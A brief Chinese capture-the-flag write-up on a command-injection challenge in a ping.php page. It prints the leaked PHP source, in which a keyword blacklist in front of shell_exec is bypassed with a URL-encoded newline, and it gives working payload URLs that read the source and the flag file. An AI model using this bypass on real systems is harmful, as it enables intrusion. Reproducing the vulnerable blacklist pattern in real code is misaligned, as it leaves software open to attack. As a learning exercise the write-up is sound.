ctf里某群友发的题:http://45.124.115.155:8003/a74a15c5fb626077/**
ls cat 啥的都被过滤了(http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20ping.php):
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.086 ms --- 127.0.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.086/0.086/0.086/0.000 ms :::::::::::::: ping.php :::::::::::::: 'sbsbbsb', ';' => 'sb', '|' => 'sb', '-' => 'sb', '$' => 'sb', '(' => 'sb', ')' => 'sb', '`' => 'sb', '||' => 'sb', '<>' => 'sb', 'bash' => 'sb', '>' => 'sb', 'wget' => 'sb', 'cat' => '', 'cd' => 'sb', '../' => 'sb', '/' => 'sb', 'rm' => 'sb', '>>' => 'sb', 'echo' => 'sb', 'curl' => 'sb', 'dd' => 'sb', ); // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // var_dump($target); // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping ' . $target ); } else { // *nix $cmd = shell_exec( 'ping -c 1 ' . $target ); } // Feedback for the end user echo "{$cmd}";
%0a 代表换行
more读取文件(当初学点运维还是挺有用的)
payload:http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20flag_is_here.php